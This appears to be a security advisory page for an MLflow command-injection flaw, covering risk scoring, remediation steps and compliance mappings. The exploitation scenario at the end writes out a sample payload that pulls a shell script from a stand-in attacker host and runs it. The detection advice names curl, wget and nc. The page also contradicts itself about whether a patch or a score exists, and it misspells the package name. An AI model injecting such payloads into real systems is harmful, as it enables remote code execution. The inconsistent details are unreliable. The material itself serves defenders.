CVE-2026-0596 — CRITICAL (CVSS 9.6)

Q: Is CVE-2026-0596 actively exploited?

No confirmed active exploitation of CVE-2026-0596 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-0596?

1. PATCH: Monitor MLflow GitHub and PyPI for a patched release; apply immediately when available. 2. WORKAROUND: Disable `enable_mlserver=True` in all model serving configurations unless operationally required. 3. ACCESS CONTROL: Restrict write permissions on model directories to trusted service accounts only — remove write access for human users and CI pipelines that don't need it. 4. INPUT VALIDATION: If `enable_mlserver=True` must remain enabled, implement an allowlist validator for `model_uri` values before they reach the shell invocation layer. 5. DETECTION: Alert on unexpected child processes spawned from MLflow serving processes (e.g., bash, sh, curl, wget, nc). Use EDR or auditd rules targeting the MLflow process tree. 6. LEAST PRIVILEGE: Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles in Kubernetes deployments.

Q: What systems are affected by CVE-2026-0596?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps platforms, training pipelines, CI/CD for ML.

Q: What is the CVSS score for CVE-2026-0596?

CVE-2026-0596 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.17%.

CISO Take

MLflow deployments using `enable_mlserver=True` are vulnerable to OS command injection through unsanitized model URIs passed to `bash -c`. Any environment where lower-privileged users can write to model directories and a higher-privileged service serves those models is exposed to privilege escalation. Immediately audit MLflow serving configurations and disable mlserver mode unless strictly required, pending patch availability.

What is the risk?

HIGH risk in multi-user or shared MLOps environments. CWE-78 command injection is a well-understood, trivially exploitable class when the attack vector is accessible. The privilege escalation path elevates this beyond a standard code execution vuln — attackers can pivot from a low-privileged ML engineer account to the service account running MLflow. MLflow is heavily deployed in enterprise data science platforms, often with broad network access to model registries and downstream inference systems. No CVSS score is assigned yet, but the exploitability profile mirrors CVSS 9.x class vulnerabilities.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
mflow	pip	< 3.9.0	`3.9.0`

Do you use mflow? You're affected.

Severity & Risk

CVSS 3.1

9.6 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 37% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Adjacent

AC Low

PR None

UI None

S Changed

C High

I High

A High

What should I do?

6 steps

PATCH

Monitor MLflow GitHub and PyPI for a patched release; apply immediately when available.
WORKAROUND

Disable enable_mlserver=True in all model serving configurations unless operationally required.
ACCESS CONTROL

Restrict write permissions on model directories to trusted service accounts only — remove write access for human users and CI pipelines that don't need it.
INPUT VALIDATION

If enable_mlserver=True must remain enabled, implement an allowlist validator for model_uri values before they reach the shell invocation layer.
DETECTION

Alert on unexpected child processes spawned from MLflow serving processes (e.g., bash, sh, curl, wget, nc). Use EDR or auditd rules targeting the MLflow process tree.
LEAST PRIVILEGE

Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles in Kubernetes deployments.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Inference AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.1.3 - Risk treatment for AI systems A.6.2.6 - Security of AI system processing environments

NIST AI RMF

GOVERN 6.1 - Policies and procedures are in place for AI risk MANAGE 2.4 - Residual risks and treatment approaches

OWASP LLM Top 10

LLM05:2025 - Supply Chain Vulnerabilities

Related AI Incidents (1)

Malicious Nx npm Packages Reportedly Weaponize AI Coding Agents for Data Exfiltration

Aug 2025 Malicious actors compromising Nx’s CI/CD pipeline and publishing tainted npm packages high confidence

The malicious Nx npm packages attack involved compromised CI workflows executing attacker-controlled code via postinstall scripts — the same class of supply chain / code execution attack as CVE-2026-0596, where unsanitized model_uri enables command injection during MLflow model serving.

AIID #1210

Source: AI Incident Database (AIID)

Frequently Asked Questions

What is CVE-2026-0596?

MLflow deployments using `enable_mlserver=True` are vulnerable to OS command injection through unsanitized model URIs passed to `bash -c`. Any environment where lower-privileged users can write to model directories and a higher-privileged service serves those models is exposed to privilege escalation. Immediately audit MLflow serving configurations and disable mlserver mode unless strictly required, pending patch availability.

Is CVE-2026-0596 actively exploited?

No confirmed active exploitation of CVE-2026-0596 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-0596?

1. PATCH: Monitor MLflow GitHub and PyPI for a patched release; apply immediately when available. 2. WORKAROUND: Disable `enable_mlserver=True` in all model serving configurations unless operationally required. 3. ACCESS CONTROL: Restrict write permissions on model directories to trusted service accounts only — remove write access for human users and CI pipelines that don't need it. 4. INPUT VALIDATION: If `enable_mlserver=True` must remain enabled, implement an allowlist validator for `model_uri` values before they reach the shell invocation layer. 5. DETECTION: Alert on unexpected child processes spawned from MLflow serving processes (e.g., bash, sh, curl, wget, nc). Use EDR or auditd rules targeting the MLflow process tree. 6. LEAST PRIVILEGE: Ensure MLflow serving processes run as non-root with minimal filesystem permissions; review service account roles in Kubernetes deployments.

What systems are affected by CVE-2026-0596?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps platforms, training pipelines, CI/CD for ML.

What is the CVSS score for CVE-2026-0596?

CVE-2026-0596 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.17%.

Technical Details

NVD Description

A command injection vulnerability exists in mlflow/mlflow when serving a model with `enable_mlserver=True`. The `model_uri` is embedded directly into a shell command executed via `bash -c` without proper sanitization. If the `model_uri` contains shell metacharacters, such as `$()` or backticks, it allows for command substitution and execution of attacker-controlled commands. This vulnerability affects the latest version of mlflow/mlflow and can lead to privilege escalation if a higher-privileged service serves models from a directory writable by lower-privileged users.

Exploitation Scenario

An adversary with write access to a shared model artifact directory (e.g., a data scientist with legitimate credentials, or an attacker who has compromised a low-privileged CI/CD pipeline) uploads a model whose registered URI contains a shell metacharacter payload such as `$(curl http://attacker.com/shell.sh | bash)` or a backtick-wrapped command. When the higher-privileged MLflow model serving process starts and invokes `bash -c` with the unsanitized URI, the injected command executes at the service's privilege level. The attacker establishes persistence, exfiltrates model artifacts, or pivots laterally within the ML infrastructure — all without ever exploiting a network-facing vulnerability directly.